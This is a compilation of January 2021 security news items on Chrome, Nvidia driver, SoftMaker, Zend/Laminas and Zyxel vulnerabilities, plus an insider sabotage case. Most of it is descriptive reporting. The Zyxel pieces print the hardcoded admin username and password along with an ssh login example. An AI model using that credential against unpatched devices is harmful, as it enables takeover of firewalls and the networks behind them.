“Heap Smashing Attacks exploit dynamic memory allocators (e.g. ,malloc) by corrupting the control structures defining the heap itself. By overflowing a heap block, attackers could overwrite adjacent heap headers that chain different heap blocks, and eventually cause the dynamic memory allocator to modify arbitrary memory locations as soon as a heap free operation is executed. The malicious payload can also be generated on-the-fly: for example, by exploiting Just-In-Time (JIT) compilation, assembled code can be written on the heap,” they wrote.
Neither Microsoft nor Google explain why the October 2020 CVE-2020-15995 is being featured again in both their Thursday security bulletins. Typically, that’s an indication that the original fix was incomplete.
More Chromium Bugs Impact Chrome and Edge
Twelve additional bugs were
reported by Google, impacting its Chromium browser engine. Both Google and
Microsoft featured the same list of vulnerabilities (CVE-2021-21106,
CVE-2021-21107, CVE-2021-21108, CVE-2021-21109, CVE-2021-21110, CVE-2021-21111,
CVE-2021-21112, CVE-2021-21113, CVE-2021-21114, CVE-2021-21115, CVE-2021-21116,
CVE-2020-16043).
The majority of the bugs were rated high-severity and tied to use-after-free bugs. Three of the vulnerabilities earned bug hunters $20,000 for their efforts. Weipeng Jiang from Codesafe Team of Legendsec at Qi’anxin Group is credited for finding both $20,000 bugs (CVE-2021-21106 and CVE-2021-21107). The first, a use-after-free bug tied to Chromium’s autofill function and the second a use-after-free bug in the Chromium media component.
Leecraso and Guang Gong of 360 Alpha Lab earned $20,000 for a CVE-2021-21108, also a use-after-free bug in the browser’s media component.
No technical details were disclosed and typically aren’t until its determined that most Chrome browsers have been updated.
Nvidia releases security updates for GPU display driver and vGPU flaws
9.1.2021
Vulnerebility
Securityaffairs
Nvidia has released security updates to address high-severity vulnerabilities
affecting the Nvidia GPU display driver and vGPU software.
Nvidia has
addressed a total of 16 flaws, including high-severity vulnerabilities affecting
the Nvidia GPU display driver and vGPU software.
The addressed flaws may lead to denial of service, escalation of privileges, data tampering, or information disclosure.
The most severe vulnerability tracked as CVE‑2021‑1051 received a CVSS score of 8.4, it could lead to denial of service or escalation of privileges.
“NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel
mode layer (
nvlddmkm.sys
) handler for DxgkDdiEscape in which an
operation is performed which may lead to denial of service or escalation of
privileges.” reads the security advisory.
The company also addressed the CVE‑2021‑1052 flaw that could lead to denial of service, escalation of privileges, and information disclosure. The vulnerability received a CVSS score of 7.8.
“NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the
kernel mode layer (
nvlddmkm.sys
) handler for DxgkDdiEscape or IOCTL in
which user-mode clients can access legacy privileged APIs, which may lead to
denial of service, escalation of privileges, and information disclosure.”
continues the advisory.
The technology company resolved CVE‑2021‑1053 and CVE‑2021‑1054 flaws that received a CVSS score of 6.6 and 6.5 respectively. Both vulnerabilities may lead to denial of service.
The unique flaw that affects GPU Display Driver for Linux, tracked as CVE‑2021‑1056, may lead to denial of service or information disclosure. The flaw has received a CVSS score of 5.3.
The company addressed 10 vulnerabilities affecting the NVIDIA VGPU SOFTWARE, eight of which relate to the vGPU manager. 9 out of 10 vulnerabilities (CVE‑2021‑1057 through CVE‑2021‑1065) received a CVSS score of 7.8
The CVE‑2021‑1066 received a severity score of 7.8.
NVIDIA Ships Patches for High-Severity Security Flaws
9.1.2021
Vulnerebility
Securityweek
NVIDIA this week announced the release of software updates for its GPU display drivers and vGPU software, with fixes for a total of 16 vulnerabilities.
A total of six security flaws were patched in the NVIDIA GPU display driver, all of them affecting the kernel mode layer. Three of the bugs impact Windows only, one affects only Linux systems, and two impact both Windows and Linux.
The most important of the issues is CVE‑2021‑1051 (CVSS score of 8.4), an issue affecting the GPU driver for Windows and which could lead to denial of service or escalation of privileges.
Next in line is CVE‑2021‑1052 (CVSS score of 7.8), a bug in NVIDIA’s driver for Windows and Linux leading to user-mode clients accessing legacy privileged APIs, which could be exploited for denial of service, escalation of privileges, and information disclosure.
Also leading to denial of service are the next two flaws addressed with this set of patches, namely CVE‑2021‑1053 (affecting Windows and Linux) and CVE‑2021‑1054 (impacting Windows only), NVIDIA explains in an advisory.
The remaining bugs could be exploited for denial of service and information disclosure. Featuring a CVSS score of 5.3, they are tracked as CVE‑2021‑1055 (impacts Windows) and CVE‑2021‑1056 (affects Linux systems).
Nine of the ten vulnerabilities addressed in NVIDIA vGPU software with this set of patches features a CVSS score of 7.8.
Affecting the guest kernel mode driver and the vGPU plugin of the NVIDIA vGPU software, two of the flaws (CVE‑2021‑1058 and CVE‑2021‑1060) could lead to tampering of data or denial of service.
The remaining issues impact the vGPU plugin of the NVIDIA vGPU manager and could lead to integrity and confidentiality loss, tampering of data, denial of service, or information disclosure. Featuring a CVSS score of 5.5, the tenth vulnerability too affects the vGPU plugin.
NVIDIA released patches to address these vulnerabilities in GeForce, NVIDIA RTX/Quadro, and NVS display drivers for Windows and Linux, as well as Tesla drivers for Windows. Patches for Tesla drivers on Linux will be released in the next couple of weeks.
Patches were also released for vGPU software (guest driver) for Windows and Linux, and for vGPU software (Virtual GPU Manager) for Citrix Hypervisor, VMware vSphere, Red Hat Enterprise Linux KVM, Nutanix AHV.
Fired Healthcare Exec Stalls Critical PPE Shipment for Months
8.1.2021
Vulnerebility
Threatpost
A fired Stradis Healthcare employee sought revenge by tampering with shipping data for desperately needed healthcare PPE.
The FBI has announced that Christopher Dobbins pleaded guilty and was sentenced to a year in prison for breaching and temporarily disabling the Stradis Healthcare shipping system using a secret account, after being fired weeks earlier.
Last March, as doctors reported having to ration and reuse personal protective equipment (PPE) to treat COVID-19 patients, Georgia-based Stradis Healthcare, which packages and ships PPE and surgical kits, was eager to step up and help, according to FBI Special Agent Roderick Coffin, who investigated the matter.
“It was both a chance for the company to contribute to the national response and a business opportunity,” Special Agent Coffin, who works out of the FBI’s Atlanta Field Office, said in a statement.
Fired Exec, Secret Account
But several weeks earlier, Georgia-based Stradis
had fired Dobbins from his job there as vice president, the FBI reported.
Although the company revoked his credentials, Dobbins maintained a secret
account, which still allowed him to access the company’s shipping data, the FBI
said. In a classic insder threat attack, Dobbins used that retrained access to
tamper with shipping data, temporarily halting the company’s efforts to
distribute the lifesaving medical equipment.
“The company’s operations ground to a halt briefly, and disruptions continued for months,” the FBI reported.
Once the company was able to figure out what was going on, the FBI says they immediately contacted law enforcement, which put the FBI Atlanta Cyber Task Force on the case.
“Given the pandemic, it was especially urgent that we figure out what happened and ensure there was no continuing compromise,” Coffin said. “We also wanted to make a statement that the FBI and the U.S. Attorney’s Office are going to investigate and prosecute these types of crimes.”
Stradis CEO and co-founder Jeff Jacobs said in a statement that the company fully cooperated with law enforcement and is eager to put the matter aside and get back to business.
Stradis’ Open Strategy
“We work every day with these heroes in the medical
community and are proud to be a key link in fighting this pandemic,” Stradis
President Adam Sokol added. “Partnering with medical professionals has been the
fundamental cornerstone of our company and what we strive to do every day –
improve the lives of patients. And right now that critical mission is more
important than ever, because we know patients’ lives are at stake, and we think
about that every minute.”
This incident highlights the risk of insider threats, like disgruntled former employees, can pose to any organization. But it’s IT users with the most privileged access, like vice presidents, who pose the biggest security threat, according to Gurucul COO Craig Cooper.
“This not probably a surprise to a lot of people, that privileged IT users and administrators are looked at as the as the biggest threat to organizations,” Cooper said during a recent Threatpost webinar devoted to insider threat mitigation.”
Cooper adds that insider threats of all types are on the rise. Those numbers are expected to jump even higher in 2021, Forrester Research predicted. Currently, about 25 percent of data breaches are tied to insider threats and researchers said they expect that number to jump by a staggering 33 percent this year, driven by staff churn and remote work.
The FBI lauded Stradis Healthcare for its early engagement and open collaboration in the investigation related to the matter and said it help expedite the investigation and get the matter settled quickly and successfully.
“In computer intrusion cases, the crime scenes are the systems in these companies’ offices, and we need their assistance to process that in a way it’s admissible in court,” Coffin said. “The FBI works very hard to proactively establish trust with companies, so when these types of things occur, we can quickly figure out what happened, and they can move forward.”
Nvidia Warns Windows Gamers of High-Severity Graphics Driver Flaws
8.1.2021 Vulnerebility Threatpost
In all, Nvidia patched flaws tied to 16 CVEs across its graphics drivers and vGPU software, in its first security update of 2021.
Nvidia, which makes gaming-friendly graphics processing units (GPUs), on Thursday fixed a slew of high-severity flaws affecting its graphics driver. The vulnerabilities allow bad actors to cripple systems with denial of service attacks, escalate privileges, tamper with data or sniff out sensitive data.
Affected is Nvidia’s graphics driver (formally known as the GPU Display Driver) for Windows. The graphics driver is used in devices targeted to enthusiast gamers; it’s the software component that enables the device’s operating system and programs to use its high-level, gaming-optimized graphics hardware.
Nvidia’s Thursday security update addresses flaws tied to 16 CVEs overall. The most severe of these (CVE‑2021‑1051) is an issue in the graphic drivers’ kernel mode layer. This flaw ranks 8.4 out of 10 on the CVSS scale, making it high severity.
2020 Reader Survey: Share Your Feedback to Help Us Improve
Kernel mode is generally reserved for the lowest-level, most trusted functions of the operating system; in this case, the layer (nvlddmkm.sys) handler for the DxgkDdiEscape interface contains a glitch where an operation is performed that could be abused to launch a denial-of-service (DoS) attack or escalate privileges.
Another high-severity flaw (CVE‑2021‑1052) in this same kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape could allow user-mode clients to access legacy privileged application programming interfaces (APIs). According to Nvidia, this “may lead to denial of service, escalation of privileges, and information disclosure.”
Nvidia also stomped out four medium-severity flaws in its graphics driver. Three of these (CVE‑2021‑1053, CVE‑2021‑1054, CVE‑2021‑1055) also stem from the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, while the fourth (CVE‑2021‑1056) exists in a kernel mode layer (nvidia.ko) that does not completely honor operating system file system permissions to provide GPU device-level isolation. That could allow for DoS or information disclosure.
Beyond its graphics drivers, Nvidia warned of flaws tied to nine high-severity CVEs in its virtual GPU (vGPU) software. Nvidia’s vGPU creates graphics-forcused virtual desktops and workstations in tandem with the company’s data center Tesla accelerator GPUs.
vGPU Software Flaws
Many of the flaws addressed in Nvidia’s Thursday security
advisory stem from Nvidia’s vGPU manager, its tool that enables multiple virtual
machines to have simultaneous, direct access to a single physical GPU, while
also using Nvidia graphics drivers deployed on non-virtualized operating
systems.
One high-severity flaw in exists in a plugin within the vGPU manager (CVE‑2021‑1057). This issue could allow guests to allocate some resources for which they are not authorized – which according to Nvidia could lead to data integrity and confidentiality loss, DoS and information disclosure. The vGPU manager also contains a flaw in the vGPU plugin (CVE‑2021‑1059), in which an input index is not validated, which could lead to integer overflow. A race condition (CVE‑2021‑1061) in the vGPU plugin of the vGPU manager could essentially trick it into using a previously validated resource that has since changed, which may lead to DoS or information disclosure.
And, in another Nvidia vGPU plugin issue (CVE‑2021‑1065), input data is not validated, which may lead to tampering of data or DoS.
Various Nvidia GeForce Windows and Linux driver branches are affected; Nvidia has released a full list of affected versions and updated driver versions on its security advisory. The graphics chip manufacturer has likewise released fixes for specific versions of the vGPU software affected by these flaws on its website.
The security advisory is Nvidia’s first in 2021. Last year, the company issued its fair share of patches; including fixes for two high-severity flaws in the Windows version of its GeForce Experience software, and a patch for a critical bug in its high-performance line of DGX servers, both in October; and a high-severity flaw in its GeForce NOW application software for Windows in November.
Google Pays Out Over $100,000 for Vulnerabilities Patched With Chrome 87 Update
8.1.2021
Vulnerebility
Securityweek
An update released this week by Google for Chrome 87 patches 16 vulnerabilities, including 14 rated high severity. The company has awarded more than $100,000 for these vulnerabilities.
These security flaws can be exploited remotely by unauthenticated attackers to execute arbitrary code and compromise the targeted systems. To trigger the weaknesses, an adversary would need to craft a malicious page and trick the user into visiting it.
Eight of the addressed vulnerabilities are use-after-free bugs impacting various components of the web browser.
The most important of these use-after-free issues affect autofill, drag and drop, and media components, and are tracked as CVE-2021-21106, CVE-2021-21107, and CVE-2021-21108, respectively.
Google paid the reporting security researchers $20,000 for each of these vulnerabilities.
Next in line are CVE-2021-21109 and CVE-2021-21110, use-after-free bugs in payments and safe browsing, respectively. The reporting researchers received $15,000 bug bounties for each of the bugs.
Google also addressed a use-after-free in Blink (CVE-2021-21112), for which it paid a $7,500 bounty reward, and two more in audio (CVE-2021-21114) and safe browsing (CVE-2021-21115), but hasn’t issued monetary rewards for them yet.
Other high-risk flaws the new browser release fixes include insufficient policy enforcement in WebUI (CVE-2021-21111), heap buffer overflow in Skia (CVE-2021-21113), insufficient data validation in networking (CVE-2020-16043), and out of bounds write in V8 (CVE-2020-15995).
Google also addressed high-severity memory corruption vulnerabilities that were identified internally, and which were not issued CVE identifiers, as well as medium-severity bugs.
Chrome 87.0.4280.141 is rolling out for Windows, Linux, and macOS. Users are advised to update to the new release to remain protected.
In an alert issued on Thursday, the Multi-State Information Sharing and Analysis Center (MS-ISAC) warned that these vulnerabilities represent a high risk for large and medium government and business entities and advised them to update as soon as possible.
SoftMaker Office Vulnerabilities Allow Code Execution via Malicious Documents
7.1.2021
Vulnerebility
Securityweek
Vulnerabilities discovered by Cisco Talos researchers in SoftMaker Office can be exploited for arbitrary code execution by creating malicious documents and tricking victims into opening them.
A German software developer, SoftMaker Software GmbH offers individuals and enterprises a popular office software suite that includes word processing, spreadsheet, presentation, and database software components. The firm’s SoftMaker Office suite provides support for common and internal document file formats.
The recently discovered vulnerabilities impact TextMaker, a component of the SoftMaker Office suite designed to deliver a complete set of word-processing capabilities. According to Talos, each of the flaws can be exploited for arbitrary code execution in the context of the targeted application.
The first of the issues, CVE-2020-13544, is a sign extension bug that affects the document-parsing functionality of TextMaker (SoftMaker Office 2021).
“A specially crafted document can cause the document parser to sign-extend a length used to terminate a loop, which can later result in the loop's index being used to write outside the bounds of a heap buffer during the reading of file data,” Cisco Talos explains.
Tracked as CVE-2020-13545, the second vulnerability is a signed conversion flaw in the same document-parsing functionality of the application.
An attacker can craft a document to cause the document parser to miscalculate a length when allocating a buffer, which will cause the application to write outside the buffer’s bounds, leading to a heap-based memory corruption.
SoftMaker Office 2021's TextMaker was also found to be affected by an integer overflow vulnerability. Tracked as CVE-2020-13546, it results in the application writing outside a buffer with a miscalculated length.
Assessed with a CVSS score of 8.8, all three vulnerabilities are now fixed. The bugs were identified in SoftMaker Office TextMaker 2021, revision 1014, and were reported to the vendor in early October.
RCE ‘Bug’ Found and Disputed in Popular PHP Scripting Framework
6.1.2021
Vulnerebility
Threatpost
Impacted are PHP-based websites running a vulnerable version of the web-app creation tool Zend Framework and some Laminas Project releases.
Versions of the popular developer tool Zend Framework and its successor Laminas Project can be abused by an attacker to execute remote code on PHP-based websites, if they are running web-based applications that are vulnerable to attack.
However, those that maintain Zend Framework emphasize that the conditions under which a web app can be abused first require the application author to write code that is “inherently insecure.” For that reason, the current maintainers of Zend Framework are contesting whether or not the vulnerability classification is correct.
“We are contesting the vulnerability, and consider our patch a security tightening patch, and not a vulnerability patch,” said Matthew Weier O’Phinney, Zend product owner and principal engineer in an email-based interview with Threatpost.
Impacted Versions of Zend Framework
Impacted is Zend Framework version 3.0.0
and Laminas Project laminas-http before 2.14.2, with an estimated “several
million websites” using the framework and possibly impacted. The new maintainers
of Zend Framework, Laminas Project, fall within the Linux Foundation’s
open-source collaborative ecosystem.
The bug was publicly disclosed Monday by cybersecurity researcher Ling Yizhou, who also published two proof-of-concept attack scenarios. The bug, tracked as CVE-2021-3007, does not have a severity rating listed with MITRE. However it is rated “high risk” by others within the cybersecurity community.
End of life for Zend Framework was Dec. 31, 2019, after which it was folded into the Laminas Project. According to the maintainers, Zend Framework and Laminas Project are equivalent.
“The project is a collection of individual components, each versioned separately. As such, ‘3.0’ refers to a handful of core components that were tagged with version 3 releases, many of which have evolved significantly from then,” O’Phinney told Threatpost.
The Deserialization Vulnerability and PoC Attack Scenarios
According to
Yizhou, the Zend Framework 3.0.0 version has a deserialization vulnerability
that can lead to remote code execution “if the content is controllable, related
to the __destruct method of the Zend\Http\Response\Stream class in Stream.php.”
Proof-of-concept (PoC) attack scenarios against Zend Framework and Laminas Project were posted a GitHub page maintained by security researcher Yizhou. Additional mitigation details are located at the Lamina Project page, also hosted on GitHub.
A deserialization (A.K.A. insecure deserialization) vulnerability is when user-controllable data is deserialized by a website. In other words, when a website allows a user to introduce untrusted data, or perform an object injection, into a web app. The injected data can abuse the logic of an application and trigger a denial-of-service (DoS) attack or allow an attacker to execute arbitrary code as the data is deserialized.
Deserialization and serialization are tech terms describing the process of turning some object (code) into a data format (serialization) that can be restored later (deserialization). “People often serialize objects in order to save them to storage, or to send as part of communications,” OWASP describes.
The vulnerability is related to the” __destruct method” within the Zend Framework’s “\Http\Response\Stream class in Stream.php.”
Disputed “Vulnerability” Classification
The Linux Foundation’s Laminas
Project is disputing the CVE classification. In a statement posted to its GitHub
page, it stated:
“On review, we feel this is not a vulnerability specific to the framework, but rather more generally to the language. The un/serialize() functions have a long history of vulnerabilities (please see https://www.google.com/search?q=php+unserialize+RCE for example), and developers should NEVER use it on untrusted input. If this is impossible, they should at the very least pass the second `$options` argument, and provide a list of allowed classes, or use the argument to disallow all unserialization of objects (see https://www.php.net/unserialize for details).
We also received the report you provided against Zend Framework. That project is no longer active, and any security issues are now resolved in the Laminas Project (which will require users migrate to Laminas from ZF). Our findings remain the same for that project, however; this is a PHP language issue, and not specific to our project.”
It further stated that the classification is more generally understood as a “PHP Object Injection” and not specific to any given framework.
“Regardless, we are providing this patch to help further protect our users from these scenarios. The patch provides type checking of the $streamName property before performing a cleanup operation (which results in an unlink() operation, which, previously, could have resulted in an implied call to an an object’s __toString() method) in the Laminas\Http\Response\Stream destructor,” the message read.
Expert found a secret backdoor in Zyxel firewall and VPN
2.1.2021
Vulnerebility
Securityaffairs
Zyxel addressed a critical flaw in its firmware, tracked as CVE-2020-29583,
related to the presence of a hardcoded undocumented secret account.
The
Taiwanese vendor Zyxel has addressed a critical vulnerability in its firmware
related to the presence of a hardcoded undocumented secret account. The
vulnerability, tracked as CVE-2020-29583 received a CVSS score of 7.8, it could
be exploited by an attacker to login with administrative privileges and take
over the networking devices.
“Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable password. The password for this account can be found in cleartext in the firmware.” reads the advisory published by NIST. “This account can be used by someone to login to the ssh server or web interface with admin privileges.”
The CVE-2020-29583 flaw affects the firmware version 4.60 that is used by multiple Zyxel devices.
The vendor removed all vulnerable firmware versions from its cloud and website, except for USG FLEX 100W/700 due to base FW upgrade.
Impacted devices include Unified Security Gateway (USG), ATP, USG FLEX and VPN firewalls products.
AFFECTED PRODUCT SERIES PATCH AVAILABLE IN
Firewalls
ATP series running
firmware ZLD V4.60 ZLD V4.60 Patch1 in Dec. 2020
USG series running firmware
ZLD V4.60 ZLD V4.60 Patch1 in Dec. 2020
USG FLEX series running firmware ZLD
V4.60 ZLD V4.60 Patch1 in Dec. 2020
VPN series running firmware ZLD V4.60 ZLD
V4.60 Patch1 in Dec. 2020
AP controllers
NXC2500 V6.10 Patch1 in April
2021
NXC5500 V6.10 Patch1 in April 2021
The vulnerability was discovered
by the security researcher Niels Teusink from EYE.
The expert discovered an undocumented account (“zyfwp”) with the password “PrOw!aN_fXp” stored in plaintext. The credentials could be also used by a malicious third-party to login to the SSH server or web interface with admin privileges.
“When doing some research (rooting) on my Zyxel USG40, I was surprised to find a user account ‘zyfwp’ with a password hash in the latest firmware version (4.60 patch 0). The plaintext password was visible in one of the binaries on the system.” reads the post published by Teusink. “I was even more surprised that this account seemed to work on both the SSH and web interface.”
$ ssh zyfwp@192.168.1.252
Password: Pr*******Xp
Router> show users current
No: 1
Name: zyfwp
Type: admin
(...)
Router>
The expert pointed
out that the user is not visible in the device’s interface and its password
cannot be changed.
Teusink reported the flaw to Zyxel on November 29 and the company addressed the flaw with the release of a firmware patch (ZLD V4.60 Patch1) on December 18.
According to the vendor, the hidden account was used to deliver automatic firmware updates to connected access points through FTP.
The expert added that around 10% of 1000 devices in the Netherlands run a
vulnerable version of the firmware.
“As the zyfwp user has admin privileges,
this is a serious vulnerability. An attacker could completely compromise the
confidentiality, integrity and availability of the device. Someone could for
example change firewall settings to allow or block certain traffic. They could
also intercept traffic or create VPN accounts to gain access to the network
behind the device. Combined with a vulnerability like Zerologon this could be
devastating to small and medium businesses.” concludes the expert.
“Because of the seriousness of the vulnerability and it being so easy to exploit, we have decided not to release the password for this account at this time. We do expect others to find and release it, which is why we suggest you install the updated firmware as soon as possible.”
Secret Backdoor Account Found in Several Zyxel Firewall, VPN Products
2.1.2021
Vulnerebility
Thehackernews
Zyxel has released a
patch to address a critical vulnerability in its firmware concerning a hardcoded
undocumented secret account that could be abused by an attacker to login with
administrative privileges and compromise its networking devices.
The flaw, tracked as CVE-2020-29583 (CVSS score 7.8), affects version 4.60 present in wide-range of Zyxel devices, including Unified Security Gateway (USG), USG FLEX, ATP, and VPN firewall products.
EYE researcher Niels Teusink reported the vulnerability to Zyxel on November 29, following which the company released a firmware patch (ZLD V4.60 Patch1) on December 18.
According to the advisory published by Zyxel, the undocumented account ("zyfwp") comes with an unchangeable password ("PrOw!aN_fXp") that's not only stored in plaintext but could also be used by a malicious third-party to login to the SSH server or web interface with admin privileges.
Zyxel said the hardcoded credentials were put in place to deliver automatic firmware updates to connected access points through FTP.
Noting that around 10% of 1000 devices in the Netherlands run the affected firmware version, Teusink said the flaw's relative ease of exploitation makes it a critical vulnerability.
"As the 'zyfwp' user has admin privileges, this is a serious vulnerability," Teusink said in a write-up. "An attacker could completely compromise the confidentiality, integrity and availability of the device."
"Someone could for example change firewall settings to allow or block certain
traffic. They could also intercept traffic or create VPN accounts to gain access
to the network behind the device. Combined with a vulnerability like Zerologon
this could be devastating to small and medium businesses."
The Taiwanese company is also expected to address the issue in its access point (AP) controllers with a V6.10 Patch1 that's set to be released in April 2021.
It's highly recommended that users install the necessary firmware updates to mitigate the risk associated with the flaw.
